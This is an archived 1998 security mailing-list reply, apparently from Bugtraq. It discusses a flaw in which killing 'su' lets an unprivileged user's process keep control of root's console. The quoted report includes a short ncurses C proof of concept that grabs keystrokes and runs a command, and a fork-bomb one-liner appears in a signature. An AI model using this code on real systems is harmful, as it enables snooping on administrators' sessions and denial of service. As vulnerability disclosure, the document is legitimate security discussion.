The described problem isn't a serious one. If user 'lcam' want to take a control over root's terminal first of all he should force root to perform 'su lcam'. So an attacker could take a control over root's terminal only in the case of unexperienced superuser su'ing to unprivileged users. Nevertheless, 'su' from SimplePAMApps package developed by Andrew Morgan <morganat_private> is free of such a problem. The program doesn't allow unprivileged user to kill it. Regards, Andrey V. Savochkin On Sat, Mar 07, 1998 at 09:06:21PM +0100, Michal Zalewski wrote: > With bash 2.01 and ncurses 4.1, any program launched at unprivledged > uid (eg. from 'su' shell) may takeover privledged user's console > (to grab keystorkes or something else). I found it's quite easy when > I tried to kill 'su' directly from unprivledged shell with signal 9: > > [root@genome /]# su lcam > [lcam@genome /]$ killall -9 su > Killed > [root@genome /]# > > That was normal, but suddenly I saw again old prompt: > > [lcam@genome /]$ > > >From this point, two bash instances (unprivledged one hasn't been > killed with su!) were controlling my console at once... It looks > just curious: > > [root@genome /]# id > uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) > [lcam@genome /]$ id > uid=502(lcam) gid=502(lcam) groups=502(lcam) > [lcam@genome /]$ > [root@genome /]# > > Of course, it isn't so scary, because it has been done manually... > But is can be easily used in nasty program. Typical administrator > believes that only unprivledged account may be compromised when > he's launching something on it, and usually he's right, but > ncurses has a vunerability which may be used to fool him. Unlike > other lame su tricks, it's quite invisible (he may check on a > second console - he's back in his REAL, root shell, but we can > still control his console). I wrote simple program (it may be even > aunched from ~/.bashrc; in the meantime, su should be killed), which > is able to grab keystorke(s) from console: > > -- test.c -- > // gcc test.c -lncurses -oanything > #include <curses.h> > int main() { > initscr(); > noecho(); > raw(); > while (1) if (getch()=='x') system("touch /tmp/VOILA"); > } > -- eof -- > > It isn't perfect, actually it grabs only one of first 'x's, and fail > to grab next ones (a lot of i/o errors when debugged ;-). But it > CAN do that. For sure it's possible to keep control much longer, as > shown above (bash example). Maybe it's even possible to do it even > after logout, I not checked it. > > _______________________________________________________________________ > Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] > Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch] > =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:43 PDT